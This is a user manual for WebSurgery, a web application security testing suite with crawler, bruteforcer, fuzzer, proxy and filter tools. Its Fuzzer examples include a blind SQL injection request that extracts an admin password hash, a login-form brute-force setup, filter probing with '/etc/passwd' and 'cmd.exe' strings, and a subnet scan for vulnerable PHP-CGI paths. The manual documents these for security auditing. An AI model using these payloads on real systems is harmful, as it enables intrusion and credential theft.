------------------------ WebSurgery User Manual Version 1.1 Sunrise Technologies Ltd Copyright © 2013 All rights reserved e: info@sunrisetech.gr w: www.sunrisetech.gr ------------------------ ================= Table of Contents ================= 1 Overview 2 Tools 2.1 Crawler 2.2 Bruteforcer 2.3 Fuzzer 2.4 Editor 2.5 Proxy 3 Extra Tools 3.1 Filters 3.2 List Generator 3.3 External Proxy ======================================================================================================== 1 Overview ======================================================================================================== WebSurgery is a suite of tools for security testing of web applications. It was designed for security auditors to help them with web application planning and exploitation. Suite currently contains a spectrum of efficient, fast and stable web tools (Crawler, Bruteforcer, Fuzzer, Proxy, Editor) and some extra functionality tools (Scripting Filters, List Generator, External Proxy). Tools ----- Crawler - High Performance Multi-Threading and Completely Parameterized Crawler - Extracts Links from HTML / CSS / JavaScript / AJAX / XHR - Hidden Structure Identification with Embedded Bruteforcer - Parameterized Timing Settings (Timeout, Threading, Max Data Size, Retries) - Parameterized Limit Rules (Case Sensitive, Process Above / Below, Dir Depth, Max Same File / Script Parameters / Form Action File) - Parameterized Extra Rules (Fetch Indexes/Sitemaps, Submit Forms, Custom Headers) - Supports Advanced Filters with Scripting & Regular Expressions (Process, Exclude, Page Not Found, Search Filters) Bruteforcer - High Performance Multi-Threading Bruteforcer for Hidden Structure (Files / Directories) - Parameterized Timing Settings (Timeout, Threading, Max Data Size, Retries) - Parameterized Rules (Base Dir, Bruteforce Dirs / Files, Recursive, File Extension, Custom Headers) - Parameterized Advanced Rules (Send GET / HEAD, Follow Redirects, Process Cookies) - Supports Advanced Filters with Scripting & Regular Expressions (Page Not Found, Search Filters) - Supports List Generator with Advanced Rules Fuzzer - High Performance Multi-Threading Fuzzer Generates Requests based on Initial Request Template - Exploitation for (Blind) SQL Injections, Cross Site Scripting (XSS), Denial of Service (DOS), Bruteforce for Username / Password Authentication Login Forms - Identification of Improper Input Handling and Firewall / Filtering Rules - Parameterized Timing Settings (Timeout, Threading, Max Data Size, Retries) - Parameterized Advanced Rules (Follow Redirects, Process Cookies) - Supports Advanced Filters with Scripting & Regular Expressions (Stop / Reset Level, Search Filters) - Supports List Generator with Advanced Rules - Supports Multiple Lists with Different Levels Proxy - Proxy Server to Analyze, Intercept and Manipulate Traffic - Parameterized Listening Interface IP Address & Port Number - Supports Advanced Filters with Scripting & Regular Expressions (Process, Intercept, Match-Replace, Search Filters) Editor - Advanced ASCII/HEX Editor to Manipulate Individual Requets - Parameterized Timing Settings (Timeout, Max Data Size, Retries) - Automatically Fix Request (Content-Length, New Lines at End) Extra Tools ----------- Scripting Filters - Advanced Scripting Filters to Filter Specific Requests / Responses - Main Variables (url, proto, hostport, host, port, pathquery, path, query, file, ext) - Request Variables (size, hsize, dsize, data, hdata, ddata, method, hasparams, isform) - Response Variables (size, hsize, dsize, data, hdata, ddata, status, hasform) - Operators =, !=, ~, !~, >=, <=, >, < - Conjunctions &, | - Supports Reverse Filters and Parenthesis List Generator - List Generator for Different List Types (File, Charset, Numbers, Dates, IP Addresses, Custom) - Parameterized Rules (Prefix, Suffix, Case, Reverse, Fixed-Length, Match-Replace) - Parameterized Crypto / Hash Rules (URL, URL All, HTML, BASE-64, ASCII, HEX, MD5, SHA-512) External Proxy - External Proxy Redirects Traffic to Another Proxy - Supports Non-Authenticated Proxies (HTTP, SOCKS4, SOCKS5) - Supports Authenticated Proxies (HTTP Basic, SOCKS5 Username / Password) - Supports DNS Lookups at Proxy Side ======================================================================================================== 2 TOOLS ======================================================================================================== =========== 2.1 Crawler =========== Crawler is designed to be fast, accurate, stable and completely parameterized using advanced techniques to extract links from HTML, CSS, Javascript and AJAX. Timing Timeout, Threading, Max Data Size, Retries Rules (Limit) Case Sensitive, Process Above / Below, Dir Depth, Max Same File / Script Parameters / Form Action File Rules (Extra) Fetch Indexes/Sitemaps, Submit Forms, Custom Headers Rules (Filters) PageNotFound [Default Value]: status=404 If you leave this blank, by default the Crawler will consider as a PageNotFound if the returned HTTP status code is 404 and it will try to automatically identify other PageNotFound responses. You could use a custom PageNotFound Filter for the redirections for a file to directory (eg: if the /test redirects to /test/):- status=404 | (status=301 & hdata~location:\s*http://www\.example\.com[/]*${path}[/]*/[\n\s\r$]+) Process [Default Value]: hostport=${init.hostport} | hostport=www.${init.hostport} If you leave this blank, by default the Crawler will process the initial url (eg: http://example.com) and if it redirects it will also process the https://example.com , http://www.example.com and https://www.example.com. However if you want to focus only on the initial protocol://hostname:port url you could specify the following Process Filter:- proto=${init.proto} & hostport=${init.hostport} Exclude [Default Value]: ext!~^(jpg|jpeg|ico|bmp|gif|png|tif|tiff|psd|dwg|cad|aiff|au|cdda|wav|wma|mp1|mp2|mp3|aac|ra|rm|mid|midi|pls|m3u|aaf|3gp|asf|avi|cam|flv|m1v|m2v|m4v|mkv|mov|mpeg|mpg|mpe|mp4|mp4v|wmv|doc|docx|pdf|rtf|lwp|mcw|tex|info|pps|ppt|123|aws|csv|odt|ods|ots|sdc|wks|xls|xlsx|xlt|7z|ace|arc|arj|bz|bz2|cab|daa|dmg|deb|gz|ipg|jar|pak|mpq|tar|zip|rar|iso|img|cue|adf|nrg|dmg|accdb|db|dbf|mdb|ldb|myd|myi|mdf|odb|ora|sql|pdb|udl|wdb|adp|exe|com|bat|msi|bak|sh|cpp|c|swf|eot|svg|ttf|woff)$ If you leave this blank, by default the Crawler will exclude all the images, video, documents, etc file extentions (eg: logo.png). Search Search filters to filter output results at the end of scan (See "3.1 Filters" for more details) =============== 2.2 Bruteforcer =============== Bruteforcer for files and directories within the web application which helps to identify the hidden structure. Timing Timeout, Threading, Max Data Size, Retries Rules (Basic) Base Dir, Bruteforce Dirs / Files, Recursive, File Extension, Custom Headers Rules (Advanced) Send GET/HEAD, Follow Redirects, Process Cookies Rules (List Type) (See "3.2 List Generator" for more details) Filters PageNotFound [Default Value]: status=404 If you leave this blank, by default the Crawler will consider as a PageNotFound if the returned HTTP status code is 404 and it will try to automatically identify other PageNotFound responses. You could use a custom PageNotFound Filter for the redirections for a file to directory (eg: if the /test redirects to /test/):- status=404 | (status~301 & hdata~location:\s*http://www\.example\.com[/]*${path}[/]*/[\n\s\r$]+) Search Search filters to filter output results at the end of scan (See "3.1 Filters" for more details) ========== 2.3 Fuzzer ========== Fuzzer is a highly advanced tool to create a number of requests based on one initial request. Fuzzer has no limits and can be used to exploit (Blind) SQL Injections, Cross Site Scripting (XSS), Denial of Service (DOS), Bruteforce for Username / Password Authentication Login Forms and identification of Improper Input Handling and Firewall / Filtering Rules. Timing Timeout, Threading, Max Data Size, Retries Rules Follow Redirects, Process Cookies Lists List Type (See "3.2 List Generator" for more details) ListID Unique list id LevelID Specifies in which level the list will run Filters Stop/Reset Level at first match To prevent sending pointeless requests you can reset a specific list or even stop the whole scan when the response will much with the applied filters. Search Search filters to filter output results at the end of scan (See "3.1 Filters" for more details) Example 1) Basic Configuration Setup Set Target http://www.example.com Set Request (Initial) GET /news.asp?id=1 HTTP/1.1 HOST: www.example.com Set List (ListID=1, LevelID=1) Numbers from 1 to 20 with Step 1 Set Request (Final) GET /news.asp?id=${List_1} HOST: www.example.com The above example will send 20 requests:- GET /news.asp?id=1 HTTP/1.1 HOST: www.example.com GET /news.asp?id=2 HTTP/1.1 HOST: www.example.com ... GET /news.asp?id=20 HTTP/1.1 HOST: www.example.com Example 2) Authentication - Bruteforce attack Let's assume that we a GET authentication form and we want to bruteforce it with usernames (admin,root) and passwords (111,222) from our files. Set Request (Initial) GET /login.php?username=&password= HTTP/1.0 Set Lists (ListID=1, LevelID=1) File List ('usernames.txt') (ListID=2, LevelID=2) File List ('passwords.txt') Set Request (Final) GET /login.php?username=${List_1}&password=${List_2} HTTP/1.1 The above example will send 4 requests:- admin 111 admin 222 (Level 2 reseting) root 111 root 222 We could also configure filters (for example if you not get 'login failed' within the data means that you got a valid user/pass pair) and Reset at Level 2 to reset the second list with the passwords to avoid sending pointless requests. The stop/reset level options are important only when you use large lists; if you use though a very small list and a lot of threads is very possible that the fuzzer would already send the requests. Example 3) Firewall / Filtering Rules Identification Set Request (Initial) GET /news.asp?id=1 HTTP/1.0 Set List (ListID=1, LevelID=1) Charset '0123456789ABCDEF' with Min length 2 and Max length 2 Set Request (Final) GET /news.asp?id=1%${List_1} HTTP/1.0 The above example will send 256 requests:- %00 %01 .. %FF By reviewing the response http status code and response size we could identify the firewall/filtering rules. This example focus one HEX codes and for just one character, we could use more attacks to identify filters in use, for example different encoding, words and sentences ("union all", "/etc/passwd, "cmd.exe", etc). Example 4) Exploiting Bling SQL Injection Let's say that vuln.php script is vulnerable to blind sql injection attacks and we want to extract the admin MD5 hash from the mysql back-end database. We will need two lists, one to say which character of the admin's password do we want to extract (MD5 Length) and the a second list with the MD5 valid characters (HEX) to test if they are equal. Set Request (Initial) GET /vuln.php?id= HTTP/1.0 Set List (ListID=1, LevelID=1) Numbers from 1 to 32 Step 1 (ListID=2, LevelID=2) Charset '0123456789ABCDEF' with Min length 1 and Max length 1 Set Request (Final) GET /vuln.php?id=1+and+'${List_2}'=substring((select+password+from+admin+limit+1),${List_1},1) HTTP/1.0 The above example will send 32*16=512 requests:- 1 0 1 1 1 2 1 3 ... 1 F (Level 2 reseting) 2 0 2 1 .. 32 E 32 F Example 5) Searching a class C network for a known vulnerable file Let's say that we want to test web servers within our class C network for the latest PHP-CGI vulnerability. We will need two lists, one to specify the IP Addresses (Class C) of our network and a second one to specify the possible vulnerable PHP-CGI scripts. Set Target (Intial) http://1.2.3.4 Set Request (Initial) GET /cgi-bin/ HTTP/1.1 HOST: 1.2.3.4 Set List (ListID=1, LevelID=1) Custom [php,php4,php5,php-cgi,php.cgi] (ListID=2, LevelID=2) IP Addresses from 1.2.3.0 to 1.2.3.255 Step 0.0.0.1 (Class C 1.2.3.0/24) Set Target (Final) http://${List_2} Set Request (Final) GET /cgi-bin/${List_1} HTTP/1.1 HOST: ${List_2} The above example will send 256*5=1280 GET requests: http://1.2.3.0/cgi-bin/php http://1.2.3.1/cgi-bin/php ... http://1.2.3.255/cgi-bin/php (Level 2 reseting) http://1.2.3.0/cgi-bin/php4 http://1.2.3.1/cgi-bin/php4 ... http://1.2.3.255/cgi-bin/php.cgi NOTES * To apply a list within the initial request you can just drag and drop the list at the point that you want to add it or manually write within the initial request ${List_} , eg: ${List_1} * You can apply a list within the target url , eg: http://${List_1}:8080 (if you use HTTP/1.1 you will need also apply this list in the HOST header) * You can apply a list within the initial request more than one times (eg. GET /news.asp?id1=${List_1}&id2=${List_1} HTTP/1.1) * All the lists that will run at the same level must have the same total requests * Preview All Lists helps you to ensure that you generated the right lists before you send the requests * Stop/Reset Level works better once not too many threads are used and the stop/reset level lists are not too small * You can use HEX Editor for more advanced requests ========== 2.4 Editor ========== A simple Editor to send individual requests. It also contains a HEX Editor for more advanced requests. ========= 2.5 Proxy ========= Proxy is a server running locally and will allow you to analyze, intercept and manipulate HTTP/HTTPS requests coming from your browser or other application which support proxies. Listener Specify which ip and port to listen (eg: 127.0.0.1:8080) Filters Process Specify which requests proxy needs to process, for example specific host (eg: host=www.example.com) Intercept Specify which requests you want to intercept Search Search filters to filter output results (See "3.1 Filters" for more details) Install/Unistall CA Certificate To avoid warning messages for SSL once and forever, you will need to install CA certificate as Trusted and then import the 'WebSurgery.cer' CA Certificate file (from the installation folder) in your browsers 'Authorities' Certificates. In case that you unistall the CA Certificate and re-install it you should also update your browser/application with the new CA Certificate file 'Websurgery.cer'. (eg: for firefox: Tools->Options->Advanced->Encryption->View Certificates->Authorities->Import) Match/Replace Rules Process filter Specify which requests match/replace rules needs to process Look In Specify where to look in -request or response- data Match (regex) Specify which part of the 'Look in' variable needs to be replaced using .NET regular expression Quick Replace Replace the above match part with the replace part List Rules Gets the match part and apply the rules list (See '3.2 List Generator' for more details) Quick Replace actually creates one 'list match/replace rule' with match "^.*$" (whole string) and for replace gets the 'Quick Replace' string. Additional for the 'Match (regex)' you can have an 'inside string'. For example if you want to replace the word 'scanner' with 'test' you justneed to have the following settings:- Match (regex): scanner Quick Replace: test However if you want to replace the word 'scanner' with 'test' but only when the previous word is one of these 'web','dns','vulnerability' then you can specify a .net regex group with the name :- Match (regex): (web|dns|vulnerability) (?scanner) Quick Replace: test ======================================================================================================== 3 Extra Tools ======================================================================================================== =========== 3.1 Filters =========== Filters can be used to filtered the Crawler's, Bruteforcer's, Fuzzer's search results. You can also use filters to specify a custom 'Page not found', 'Process', 'Exlude' filter for Crawler and Bruteforcer. The following syntax is valid: ... (parenthesis are also available) where: : : & for AND | for OR [Main variables] url // https://www.example.com:232/dir1/file.asp?param=1 proto // https hostport // www.example.com:232 host // www.example.com port // 232 pathquery // /dir1/file.asp?param=1 path // /dir1/file.asp query // ?param=1 file // file.asp ext // asp [Request variables] rq.size // request size rq.hsize // request headers size rq.dsize // request data size rq.data // request data rq.hdata // request headers data rq.ddata // request body data rq.method // request method (eg: GET) rq.hasparams // if it has GET/POST parameters rq.isform // request that came from a response that had a
inside (works only for crawler's filters) [Response variables] (rp. is optional) rp.size // response size rp.hsize // response headers size rp.dsize // response data size rp.data // response data rp.hdata // response headers data rp.ddata // response body data rp.status // http response headers status (eg. 404) rp.hasform // reponse body data includes
tags Additionally, you can use Main variables within values for current or initial request. The following syntax is valid for Main variable-values:- ${Main_variable_name} for current request (See "2.1 Crawler Filters") ${init.Main_variable_name} for initial request (See "2.1 Crawler Filters") [Operators] = // equal (ignores spaces at begin/end) != // not equal ~ // regular expression .net match !~ // regular expression .net not match >= // greater or equal <= // less or equal > // greater < // less [Additional features] !(statement) // reverses the meaning of the statement (true->false) [Examples] 1. url~\.php$ // show all requests that url ends with .php 2. data~password // show all requests that have the word 'password' within the whole response data 3. hasparams=true // show requests that accept inputs -form(get/post) or query string 4. method=post // show form : post requests 5. (url~\.php$ & size>100) | status~3[0-9[0-9] // show requests that (url ends with .php AND packet size is greater than 100bytes) OR http status codes match with 3xx ================== 3.2 List Generator ================== List Generator produces a list(s) for Bruteforcer and Fuzzer. [Lists] File // Reads lines from a specific file and creates the list Charset // All combination from Min to Max Length from a specific charset Numbers // A list of numbers from X to Y (with Step Z and Format) Dates // A list of dates from X to Y (with Step Z days/months and Format) IPs // A list of IP Addresses from X to Y (with Step Z) Custom // A quick custom list Additional rule(s) can be applied to create more advanced lists. [List Rules] Prefix // Adds a prefix Suffix // Adds a suffix Case // Changes the case to Upper or Lower Reverse // Reverse every list's record Fixed Length // Changes the legth to fixed with a specific char at end or begin Match Replace // Replaces every list's record that matches to the applied reqular expression Hash // Creates the hash of every list's record (MD5, SHA-512 currently available) Encode // Encodes every list's record (URL, URL All, HTML, Base64, Ascii, Hex currently available) Decode // Decodes every list's record (URL, HTML, Base64 currently available) ================== 3.3 External Proxy ================== You can configure WebSurgery to send all the traffic generated through a proxy. Currently, supports HTTP proxies without authentication or with basic authentication, Socks4 proxies without authentication, Socks5 with without authentication or with username/password authentication and DNS Lookups at the proxy's side. You could also configure Proxy to listen locally and then configure it also as external so you can review which packets exactly were sent from WebSurgery Suite.